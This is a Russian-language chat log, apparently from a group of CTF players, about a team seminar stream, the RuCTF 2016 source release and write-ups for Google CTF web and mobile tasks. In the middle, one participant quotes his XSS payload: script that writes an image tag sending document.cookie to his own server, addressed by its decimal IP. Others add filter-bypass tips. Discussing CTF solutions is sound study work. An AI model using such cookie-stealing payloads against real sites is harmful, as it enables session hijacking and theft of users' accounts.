I'm readonly.

Привет всем! А у нас сейчас командный семинар и мы транслируем его в перископ. Тема семинара от новичков и анонс в группе vk.com/sibears_tomsk А сама трансляция вот, хоть уже и конец, но может кто запись посмотрит https://www.periscope.tv/w/aezKODFXZ0VndlBEbkRqdlB8MXZBeFJtTEFybk5KbGPqeMAsvzLI-AJrn1CJn4ACmbZP3T0QBMHHnHu6vMWe

спасибо смотрю_

кайф

Завершена 1 минуту назад

а все

Ставь лайки, подписывайся ?

)

экран плоховато видно

слушайте - вопрос насущный как вы авы для тимы делали?

а то мы до сих пор без авы

Продолжаем трансляцию) Но скажу еше раз, что для очень новчиков семинар)

Завершена 8 минут назад

У нас сел айфон, потому продолжения не вышло :)

)

ой, чото видео всего 18 минут вышло

Да, нам нужен человек в команду с заряженным айфоном.

или с вебкой за пару тыщ рублей ;)

есть в мск)

разбор тасков с олимпиады: https://new.vk.com/wall-2638406_677 видеоразбор RuCTF: https://new.vk.com/wall-2638406_673

Ура, мы заопенсорсили репозиторий RuCTF 2016: https://github.com/HackerDom/ructf-2016

круто

еще бы дампов трафика

Наши дампы остались лежать на ноуте(

дампов, к сожалению, нет

еще бы дампов трафика

http://is.gd/cBsP1M

https://github.com/HackerDom/ructf-2016/commit/250662daf6d3ef1b709f610a7281d7372b7c1a50 закоммитил исходники сервиса discoball на языке swift

http://is.gd/cBsP1M

бесконечное спасибо

кто уже врайтапы написал на гугл?

пишем

противные xsskи были

ну как противные - я не в то русло вначале со второй копал

пытался обойти XSS protect от chrome

у них же бот был на хроме

а третья xss гуглится

фильтрация точки*

http://countersite.org/83-web-writeup-googlectf-wallowing-wallabies.html

весь день делал райтап

тк случайно удалил)

схоронил сайт https://requestb.in/ спс)

по второму xss: у тебя там img.src='...', достаточно было написать img.src = (с пробелом)

точно спасибо)

был тогда в экстазе после 3 часов

в третьем у меня было что-то типа``` document["write"]("<img src=\"http:////123123123//?cookie=\"+document['cookie']\"")` где 123123123 — десятичное представление ip адреса сервера (да, оно так работает!), а //// потому что // заменяется на /

круто)

ну я там пометку сделал

что способов много

мне тот который в статье понравился)

хотя на ктф я пользовался другим способом

http://seclists.org/fulldisclosure/2008/Jun/230

вот этим на ктф)

а вы какая команда?

мы далеко от топа :В

мы тоже)

кто-то mobile 1 решил?

у нас в команде AseN все мобайлы решил

скоро райтап будет

ну как скоро - там писать много

если что - тут инфа о райтапе появится vk.com/invulnerble

тк не всегда в телеграм захожу

кстати если кто хочет помочь в заполнении itsecwiki.org - вики по решению ктф тасков, то будем рады предоставить аккаунт на команду!

Богдан я тут подумал

десятичное представление ip адреса сервера не всегда работает

тк очень часто требуется заголовок HOst

host*

а у тебя он отстутствует

https://habrahabr.ru/post/282846/

да ладно блин. сделал все то же самое, но у меня вместо plaintext строчек из тех 2 функций возвращался мусор :(

(1 таск)

слушай алексей

а как ты так быстро нашел его?)

Asen только успел его запостить - а ты как на подхвате)

я просто подписан на https://telegram.me/HakerNews

:D

Богдан, у нас тоже мусор был)

IIjsWa}iyYSmksJIYlEL[xj`zux`nk^vzfOARkiPkYmbFftKqusfn}flhQfsqxr\TeaSgnmdc! TRytfrgooq|F{i-JovFBungFk\Vlpkd\bwvj~HuDgaeTzuSt.@Lex^~wnwGrab{OutbhrCtfqm}

длина та же, 77 символов

Grab{Out ))

ага, совсем троллинг

я от Сбербанка мне дали задание выяснить настроения в массах. Сбер участвовал как спонсор. насколько хорошо было все органзиовано, проводился ли рекрутмент или сторонние мероприятия и мнение о тех же подарках и выступлении спикера. Есть шанс помочь нам в следующий раз сделать все еще на более высоком уровне.

Какой хоть ктф)

RuCTF сейчас интересен видимо.

Всем по рюкзаку

Книги по телепатии и нанозондам из библиотеки Сбербанка бесценны.